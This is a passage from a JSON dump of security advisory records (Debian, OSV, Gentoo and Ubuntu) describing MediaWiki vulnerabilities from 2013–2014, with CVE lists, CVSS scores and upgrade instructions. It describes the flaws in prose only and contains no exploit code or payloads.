stylesheets, which could lead to\n XSS when an XSL was used to include JavaScript.\n\nCVE-2013-6453\n\n MediaWiki's SVG sanitization could be bypassed when the XML was\n considered invalid.\n\nCVE-2013-6454\n\n MediaWiki's CSS sanitization did not filter -o-link attributes,\n which could be used to execute JavaScript in Opera 12.\n\nCVE-2013-6472\n\n MediaWiki displayed some information about deleted pages in\n the log API, enhanced RecentChanges, and user watchlists.\n\nCVE-2014-1610\n\n A remote code execution vulnerability existed if file upload\n support for DjVu (natively handled) or PDF files (in\n combination with the PdfHandler extension) was enabled.\n Neither file type is enabled by default in MediaWiki.\n\n(ID assignment pending)\n\n Cross site request forgery in login form: an attacker could login\n a victim as the attacker.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.19.14+dfsg-0+deb7u1 of the mediawiki package and 3.5~deb7u1\nof the mediawiki-extensions package.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:1.19.14+dfsg-1 of the mediawiki package and 3.5 of the\nmediawiki-extensions package.\n\nWe recommend that you upgrade your mediawiki packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2014-03-30T09:25:39", "type": "debian", "title": "[SECURITY] 
[DSA 2891-1] mediawiki security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2031", "CVE-2013-4567", "CVE-2013-4568", "CVE-2013-4572", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610"], "modified": "2014-03-30T09:25:39", "id": "DEBIAN:DSA-2891-1:05758", "href": "https://lists.debian.org/debian-security-announce/2014/msg00064.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-21T23:14:26", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2891-3 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nMarch 31, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mediawiki, mediawiki-extensions\nCVE ID : CVE-2013-2031 CVE-2013-4567 CVE-2013-4568 CVE-2013-4572 \n CVE-2013-6452 CVE-2013-6453 CVE-2013-6454 CVE-2013-6472\n CVE-2014-1610 CVE-2014-2665\nDebian Bug : 729629 706601 742857 742857\n\nThe Mediawiki update issued as DSA 2891-1 caused regressions. This\nupdate fixes those problems. 
For reference the original advisory\ntext follows.\n\nSeveral vulnerabilities were discovered in MediaWiki, a wiki engine.\nThe Common Vulnerabilities and Exposures project describes the following\nissues:\n\nCVE-2013-2031\n\n Cross-site scripting attack via valid UTF-7 encoded sequences\n in a SVG file.\n\nCVE-2013-4567 & CVE-2013-4568\n\n Kevin Israel (Wikipedia user PleaseStand) reported two ways\n to inject Javascript due to an incomplete blacklist in the\n CSS sanitizer function.\n\nCVE-2013-4572\n\n MediaWiki and the CentralNotice extension were incorrectly setting\n cache headers when a user was autocreated, causing the user's\n session cookies to be cached, and returned to other users.\n\nCVE-2013-6452\n\n Chris from RationalWiki reported that SVG files could be\n uploaded that include external stylesheets, which could lead to\n XSS when an XSL was used to include JavaScript.\n\nCVE-2013-6453\n\n MediaWiki's SVG sanitization could be bypassed when the XML was\n considered invalid.\n\nCVE-2013-6454\n\n MediaWiki's CSS sanitization did not filter -o-link attributes,\n which could be used to execute JavaScript in Opera 12.\n\nCVE-2013-6472\n\n MediaWiki displayed some information about deleted pages in\n the log API, enhanced RecentChanges, and user watchlists.\n\nCVE-2014-1610\n\n A remote code execution vulnerability existed if file upload\n support for DjVu (natively handled) or PDF files (in\n combination with the PdfHandler extension) was enabled.\n Neither file type is enabled by default in MediaWiki.\n\nCVE-2014-2665\n\n Cross site request forgery in login form: an attacker could login\n a victim as the attacker.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.19.15+dfsg-0+deb7u1 of the mediawiki package and 3.5~deb7u2\nof the mediawiki-extensions package.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:1.19.15+dfsg-1 of the mediawiki package and 3.5 of the\nmediawiki-extensions 
package.\n\nWe recommend that you upgrade your mediawiki packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2014-04-04T18:02:59", "type": "debian", "title": "[SECURITY] [DSA 2891-3] mediawiki regression update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2031", "CVE-2013-4567", "CVE-2013-4568", "CVE-2013-4572", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2665"], "modified": "2014-04-04T18:02:59", "id": "DEBIAN:DSA-2891-3:4C320", "href": "https://lists.debian.org/debian-security-announce/2014/msg00068.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-29T23:26:21", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3011-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nAugust 23, 2014 
http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mediawiki\nCVE ID : CVE-2014-5241 CVE-2014-5243\nDebian Bug : 752622 758510\n\nIt was discovered that MediaWiki, a website engine for collaborative\nwork, is vulnerable to JSONP injection in Flash (CVE-2014-5241) and\nclickjacking between OutputPage and ParserOutput (CVE-2014-5243). The\nvulnerabilities are addressed by upgrading MediaWiki to the new upstream\nversion 1.19.18, which includes additional changes.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1:1.19.18+dfsg-0+deb7u1.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your mediawiki packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2014-08-23T15:27:05", "type": "debian", "title": "[SECURITY] [DSA 3011-1] mediawiki security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5241", "CVE-2014-5243"], "modified": "2014-08-23T15:27:05", "id": "DEBIAN:DSA-3011-1:91EB7", "href": "https://lists.debian.org/debian-security-announce/2014/msg00196.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-21T23:04:32", "description": "- 
-------------------------------------------------------------------------\nDebian Security Advisory DSA-3011-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nAugust 23, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mediawiki\nCVE ID : CVE-2014-5241 CVE-2014-5243\nDebian Bug : 752622 758510\n\nIt was discovered that MediaWiki, a website engine for collaborative\nwork, is vulnerable to JSONP injection in Flash (CVE-2014-5241) and\nclickjacking between OutputPage and ParserOutput (CVE-2014-5243). The\nvulnerabilities are addressed by upgrading MediaWiki to the new upstream\nversion 1.19.18, which includes additional changes.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1:1.19.18+dfsg-0+deb7u1.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your mediawiki packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2014-08-23T15:27:05", "type": "debian", "title": "[SECURITY] [DSA 3011-1] mediawiki security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5241", "CVE-2014-5243"], "modified": "2014-08-23T15:27:05", "id": "DEBIAN:DSA-3011-1:FA8C2", "href": 
"https://lists.debian.org/debian-security-announce/2014/msg00196.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2022-08-10T07:09:19", "description": "\nIt was discovered that MediaWiki, a website engine for collaborative\nwork, is vulnerable to JSONP injection in Flash ([CVE-2014-5241](https://security-tracker.debian.org/tracker/CVE-2014-5241)) and\nclickjacking between OutputPage and ParserOutput ([CVE-2014-5243](https://security-tracker.debian.org/tracker/CVE-2014-5243)). The\nvulnerabilities are addressed by upgrading MediaWiki to the new upstream\nversion 1.19.18, which includes additional changes.\n\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1:1.19.18+dfsg-0+deb7u1.\n\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\n\nWe recommend that you upgrade your mediawiki packages.\n\n\n", "cvss3": {}, "published": "2014-08-23T00:00:00", "type": "osv", "title": "mediawiki - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5241", "CVE-2014-5243"], "modified": "2022-08-10T07:09:14", "id": "OSV:DSA-3011-1", "href": "https://osv.dev/vulnerability/DSA-3011-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-21T08:29:02", "description": "\nSeveral vulnerabilities were discovered in MediaWiki, a wiki engine.\nThe Common Vulnerabilities and Exposures project identifies the following\nissues:\n\n\n* 
[CVE-2013-2031](https://security-tracker.debian.org/tracker/CVE-2013-2031)\nCross-site scripting attack via valid UTF-7 encoded sequences\n in a SVG file.\n* [CVE-2013-4567](https://security-tracker.debian.org/tracker/CVE-2013-4567)\n & [CVE-2013-4568](https://security-tracker.debian.org/tracker/CVE-2013-4568)\nKevin Israel (Wikipedia user PleaseStand) reported two ways\n to inject Javascript due to an incomplete blacklist in the\n CSS sanitizer function.\n* [CVE-2013-4572](https://security-tracker.debian.org/tracker/CVE-2013-4572)\nMediaWiki and the CentralNotice extension were incorrectly setting\n cache headers when a user was autocreated, causing the user's\n session cookies to be cached, and returned to other users.\n* [CVE-2013-6452](https://security-tracker.debian.org/tracker/CVE-2013-6452)\nChris from RationalWiki reported that SVG files could be\n uploaded that include external stylesheets, which could lead to\n XSS when an XSL was used to include JavaScript.\n* [CVE-2013-6453](https://security-tracker.debian.org/tracker/CVE-2013-6453)\nMediaWiki's SVG sanitization could be bypassed when the XML was\n considered invalid.\n* [CVE-2013-6454](https://security-tracker.debian.org/tracker/CVE-2013-6454)\nMediaWiki's CSS sanitization did not filter -o-link attributes,\n which could be used to execute JavaScript in Opera 12.\n* [CVE-2013-6472](https://security-tracker.debian.org/tracker/CVE-2013-6472)\nMediaWiki displayed some information about deleted pages in\n the log API, enhanced RecentChanges, and user watchlists.\n* [CVE-2014-1610](https://security-tracker.debian.org/tracker/CVE-2014-1610)\nA remote code execution vulnerability existed if file upload\n support for DjVu (natively handled) or PDF files (in\n combination with the PdfHandler extension) was enabled.\n Neither file type is enabled by default in MediaWiki.\n* [CVE-2014-2665](https://security-tracker.debian.org/tracker/CVE-2014-2665)\nCross site request forgery in login form: an attacker could 
login\n a victim as the attacker.\n\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1:1.19.14+dfsg-0+deb7u1 of the mediawiki package and 3.5~deb7u1\nof the mediawiki-extensions package.\n\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:1.19.14+dfsg-1 of the mediawiki package and 3.5 of the\nmediawiki-extensions package.\n\n\nWe recommend that you upgrade your mediawiki packages.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2014-03-30T00:00:00", "type": "osv", "title": "mediawiki - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2031", "CVE-2013-2032", "CVE-2013-4567", "CVE-2013-4568", "CVE-2013-4572", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2665"], "modified": "2022-07-21T05:48:13", "id": "OSV:DSA-2891-1", "href": "https://osv.dev/vulnerability/DSA-2891-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2022-01-17T19:07:10", "description": "### Background\n\nMediaWiki is a collaborative editing software used by large 
projects such as Wikipedia. \n\n### Description\n\nMultiple vulnerabilities have been discovered in MediaWiki. Please review the CVE identifiers and MediaWiki announcement referenced below for details. \n\n### Impact\n\nA remote attacker may be able to execute arbitrary code with the privileges of the process, create a Denial of Service condition, obtain sensitive information, bypass security restrictions, and inject arbitrary web script or HTML. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll MediaWiki 1.23 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-apps/mediawiki-1.23.8\"\n \n\nAll MediaWiki 1.22 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-apps/mediawiki-1.22.15\"\n \n\nAll MediaWiki 1.19 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-apps/mediawiki-1.19.23\"", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-02-07T00:00:00", "type": "gentoo", "title": "MediaWiki: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2242", "CVE-2014-2243", "CVE-2014-2244", "CVE-2014-2665", "CVE-2014-2853", "CVE-2014-5241", "CVE-2014-5242", "CVE-2014-5243", "CVE-2014-7199", "CVE-2014-7295", "CVE-2014-9276", "CVE-2014-9277", "CVE-2014-9475", "CVE-2014-9476", "CVE-2014-9477", "CVE-2014-9478", "CVE-2014-9479", "CVE-2014-9480", "CVE-2014-9481", "CVE-2014-9487", "CVE-2014-9507"], "modified": "2015-02-07T00:00:00", "id": "GLSA-201502-04", "href": "https://security.gentoo.org/glsa/201502-04", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2022-08-04T14:19:57", "description": "Cross-site scripting (XSS) vulnerability in\nmediawiki.page.image.pagination.js in MediaWiki 1.22.x before 1.22.9 and\n1.23.x before 1.23.2 allows remote attackers to inject arbitrary web script\nor HTML via vectors involving the multipageimagenavbox class in conjunction\nwith an action=raw value.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | Introduced in 1.22, thus none of our packages are affected\n", "cvss3": {}, "published": "2014-08-22T00:00:00", "type": "ubuntucve", "title": "CVE-2014-5242", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5242"], "modified": "2014-08-22T00:00:00", "id": "UB:CVE-2014-5242", "href": "https://ubuntu.com/security/CVE-2014-5242", "cvss": {"score": 4.3, "vector": 
"AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:32:21", "description": "The JSONP endpoint in includes/api/ApiFormatJson.php in MediaWiki before\n1.19.18, 1.20.x through 1.22.x before 1.22.9, and 1.23.x before 1.23.2\naccepts certain long callback values and does not restrict the initial\nbytes of a JSONP response, which allows remote attackers to conduct\ncross-site request forgery (CSRF) attacks, and obtain sensitive\ninformation, via a crafted OBJECT element with SWF content consistent with\na restricted character set.", "cvss3": {}, "published": "2014-08-22T00:00:00", "type": "ubuntucve", "title": "CVE-2014-5241", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5241"], "modified": "2014-08-22T00:00:00", "id": "UB:CVE-2014-5241", "href": "https://ubuntu.com/security/CVE-2014-5241", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:21:05", "description": "MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 does\nnot properly sanitize SVG files, which allows remote attackers to have\nunspecified impact via invalid XML.", "cvss3": {}, "published": "2014-05-12T00:00:00", "type": "ubuntucve", "title": "CVE-2013-6453", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": 
"PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6453"], "modified": "2014-05-12T00:00:00", "id": "UB:CVE-2013-6453", "href": "https://ubuntu.com/security/CVE-2013-6453", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:21:05", "description": "Cross-site scripting (XSS) vulnerability in MediaWiki before 1.19.10, 1.2x\nbefore 1.21.4, and 1.22.x before 1.22.1 allows remote attackers to inject\narbitrary web script or HTML via crafted XSL in an SVG file.", "cvss3": {}, "published": "2014-05-12T00:00:00", "type": "ubuntucve", "title": "CVE-2013-6452", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6452"], "modified": "2014-05-12T00:00:00", "id": "UB:CVE-2013-6452", "href": "https://ubuntu.com/security/CVE-2013-6452", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:21:06", "description": "MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1\nallows remote attackers to obtain information about deleted page via the\n(1) log API, (2) enhanced RecentChanges, and (3) user watchlists.", "cvss3": {}, "published": "2014-05-12T00:00:00", "type": "ubuntucve", "title": "CVE-2013-6472", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6472"], "modified": "2014-05-12T00:00:00", "id": "UB:CVE-2013-6472", "href": "https://ubuntu.com/security/CVE-2013-6472", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T14:19:56", "description": "MediaWiki before 1.19.18, 1.20.x through 1.22.x before 1.22.9, and 1.23.x\nbefore 1.23.2 does not enforce an IFRAME protection mechanism for\ntranscluded pages, which makes it easier for remote attackers to conduct\nclickjacking attacks via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | bug not visible on 2014-08-14\n", "cvss3": {}, "published": "2014-08-22T00:00:00", "type": "ubuntucve", "title": "CVE-2014-5243", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5243"], "modified": "2014-08-22T00:00:00", "id": "UB:CVE-2014-5243", "href": "https://ubuntu.com/security/CVE-2014-5243", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T13:32:04", "description": "Cross-site scripting (XSS) vulnerability in MediaWiki 1.19.9 before\n1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 allows 
remote\nattackers to inject arbitrary web script or HTML via unspecified CSS\nvalues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2020-01-28T00:00:00", "type": "ubuntucve", "title": "CVE-2013-6451", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451"], "modified": "2020-01-28T00:00:00", "id": "UB:CVE-2013-6451", "href": "https://ubuntu.com/security/CVE-2013-6451", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:22:31", "description": "MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5, and 1.19.x before\n1.19.11, when DjVu or PDF file upload support is enabled, allows remote\nattackers to execute arbitrary commands via shell metacharacters in (1) the\npage parameter to includes/media/DjVu.php; (2) the w parameter (aka width\nfield) to thumb.php, which is not properly handled by\nincludes/media/PdfHandler_body.php; and possibly unspecified vectors in (3)\nincludes/media/Bitmap.php and (4) includes/media/ImageHandler.php.", "cvss3": {}, "published": "2014-01-30T00:00:00", "type": "ubuntucve", "title": "CVE-2014-1610", "bulletinFamily": "info", 
"cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1610"], "modified": "2014-01-30T00:00:00", "id": "UB:CVE-2014-1610", "href": "https://ubuntu.com/security/CVE-2014-1610", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:21:12", "description": "Cross-site scripting (XSS) vulnerability in includes/actions/InfoAction.php\nin MediaWiki before 1.21.9 and 1.22.x before 1.22.6 allows remote attackers\nto inject arbitrary web script or HTML via the sort key in an info 